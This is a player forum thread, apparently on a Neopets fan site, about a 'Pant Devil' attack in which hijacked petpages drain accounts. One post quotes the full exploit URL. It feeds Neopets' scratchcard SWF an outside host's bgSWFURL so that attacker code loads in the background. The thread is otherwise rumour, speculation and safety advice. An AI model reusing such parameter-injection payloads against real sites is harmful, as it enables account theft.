ALERT! possible cookie grabber on petpages!

Adris Undead

Well I don't know if this is a cookie grabber or not because I have no been affected, but it seems some petpages have turned to "pant devil petpages" where you can see a pic of the pant devil and a link to a scratchcard, again, I do not know if it's a cookie grabber because I haven't clicked on it :S

if you're tricked into visiting a petpage and see that DO NOT CLICK ON THE LINK!! it'll take you a scratch card but do not scratch it!.

here's some boards talking about it

http://www.neopets.com/neoboards/topic.phtml?topic=129271055

http://www.neopets.com/neoboards/topic.phtml?topic=129270272

ka3evc.jpg

(edit) this is what one of the posts say:

clicking on the link will give someone your password to your account. Ppl who have clicked have seen their neopoints withdrawn almost immediately after clicking. If you have clicked, immediately change your word and pin. log out- when you do so anyone else on your account will be logged out and lose access.

To be honest I don't know what to believe.. the boards are in disarray as people go into a state of paranoia. It looks like Mob Mentality to me. Some of the earlier boards states that it takes your neopoints and changes your passwords, But some of the newer boards are now saying it also changes your active pets pet page to the pant devil page. Rumours are flying everywhere.

Oh, Thank God! I was so worried, I changed my pin and pass anyway, I hope that TNT can stop it soon, so many accounts will be frozen :(

Another board discussing the Pant Devil problem: http://www.neopets.com/neoboards/topic.phtml?topic=129275209

I don't know about the other boards, but the ones on this one are trying to figure out the problem and how to stop it. They're clicking the link on purpose and doing other stuff, I believe.

NICE! Apparently, the hacker has found an exploit in the scratchcard SWF which allows them to load their own url to run in the background.

https://images.neopets.com/scratchcard_v23.swf?joe=bob&random=392785&matchesNeededToWin=3&zonesScratchableMax=6&
startText=Scratch%20the%20fields%20to%20win%20a%20prize!&loadingText=&bgSWFURL=[b][u]http://petpage.50gigs.net/bg.swf[/u][/b]&
endText=Click%20below%20to%20see%20what%20you%20won!&buttonText=Click%20Here%20To%20Return!&buttonURL=/&
scratchSWFURL1=desert_item3_v1_mc&scratchSWFURL2=desert_item4_v1_mc&scratchSWFURL3=desert_item5_v1_mc&
scratchSWFURL4=desert_item6_v1_mc&scratchSWFURL5=desert_item6_v1_mc&scratchSWFURL6=desert_item8_v1_mc&
scratchSWFURL7=desert_item9_v1_mc&scratchSWFURL8=desert_item10_v1_mc&scratchSWFURL9=desert_item11_v1_mc&winner=1%E2%8C
%A9=en&forceStartText=Click%20Here%20to%20Start&beginEachScratchURL=http://www.neopets.com/desert
/sc/scratch_update.phtml?card_level=1%27,%20%27flash_97505124257%27,%20%27550%27,%20%27400%27,%20%276%27,
%20%27#FFFFFF

CAUTION: do not go to that url as that is the pant devil url.

also, contrary to popular belief on the neoboards, the petpage is not (1) offsite, or (2) an embed. it is actually the scratch card swf that is hosted on neopets itself. all the hacker is doing is feeding it their own parameters. having said that, my thoughts on this are that: the program to which it links has direct access to your account (since you are connected to something that is on the site already), and the cookies are accessible.

now it terms of it stealing your password, i'm sure that it doesn't. if it changes your password, you can get it back via email. but the fact that your items and np will be gone, is almost a certainty. also, it is almost certain that tnt will freeze your account since your petpages will turn into the same page that caught you.

what TNT needs to do is take the scratch card SWF down until they can resolve the problem.

"what TNT needs to do is take the scratch card SWF down until they can resolve the problem."

The problem is, it's around midnight for them, so they probably won't know about this til the morning.

UPDATE!

I've learned after a very long and confusing discussion along with a few personal scans that there are no cookie grabbers involved in this. Rather it is some sort of information grabber that's set to grab and get info from certain spots on your account. It was either done wrong or just doesn't work on Neopets, but they can't actually do anything to your account except withdraw your Neopets into your hand and change your active pets petpage to a PDP.

Yay someone else has too much time on their hands. I'm not touchin' chit but my dailies now until this is resolved.

Yay someone else has too much time on their hands. I'm not touchin' chit but my dailies now until this is resolved.

I just spent way to long discussing this and once again I've been exposed to people who can't seen to read basic English and assume that when I say "well I think" that means I'm proclaiming it as fact. Is very frustrating. But I at least figured out the cause. Whoever is behind it and why is a mystery. I'm tempted to make a conspiracy theory thread just because I desperately want this to be a plot device for TNT to start something with the Pant Devil.

I just spent way to long discussing this and once again I've been exposed to people who can't seen to read basic English and assume that when I say "well I think" that means I'm proclaiming it as fact. Is very frustrating. But I at least figured out the cause. Whoever is behind it and why is a mystery. I'm tempted to make a conspiracy theory thread just because I desperately want this to be a plot device for TNT to start something with the Pant Devil.

Herm..TNT planning something like this doesn't sound like something I've ever heard of, especially to use such harsh methods without anyone having a clue.

This isn't the first mass attack against users and I'm certain it wont be the last.

I'm just going to wait it out and play it safe because it sounds too off to be on purpose by TNT.

(Unless Ian was behind it..then..maybe...but even that is a stretch)

Herm..TNT planning something like this doesn't sound like something I've ever heard of, especially to use such harsh methods without anyone having a clue.

This isn't the first mass attack against users and I'm certain it wont be the last.

I'm just going to wait it out and play it safe because it sounds too off to be on purpose by TNT.

(Unless Ian was behind it..then..maybe...but even that is a stretch)

Well it that isn't the case then I at least hope whoever is behind it comes forward and explains how. It would require some form of hacking to get those petpages edited in the first place unless it's some sort of group thing with a few people doing all this.

Well it that isn't the case then I at least hope whoever is behind it comes forward and explains how. It would require some form of hacking to get those petpages edited in the first place unless it's some sort of group thing with a few people doing all this.

I've seen larger sites get hacked in worse ways :/ this is just a flaw someone figured out how to take advantage of.

Same thing with viruses on Windows. It had a flaw someone figured out how to take advantage of.

Lol, I saws you on zee boards ;D

Personally, I don't think that there's anything to worry about.

People will ramble alot if they take down scratchcards again, I tell you. However, they probably don't realise that it's for their own safety...

The best for now is to be careful and not to click on anything suspicious... Nobody wants to lose all their achievements and then be iced because of this dirty trick :k.

I really don't understand people who do things like this. It's just a harmless game. It's supposed to be fun. There's nothing to gain from stealing people's passwords. It's just a stupid scam that makes people sad/angry. So why do some people go to great lengths to accomplish these scams? Don't get it :S

I really don't understand people who do things like this. It's just a harmless game. It's supposed to be fun. There's nothing to gain from stealing people's passwords. It's just a stupid scam that makes people sad/angry. So why do some people go to great lengths to accomplish these scams? Don't get it :S

The same reason why hacker clubs and online hancker gangs exist, and why viruses are constantly pumped out every year. Malicious intent and simply having too much time on their hands to do anything decent with their skills. Very sad, but thats how the world goes, same thing happens in neopia too i suppose :(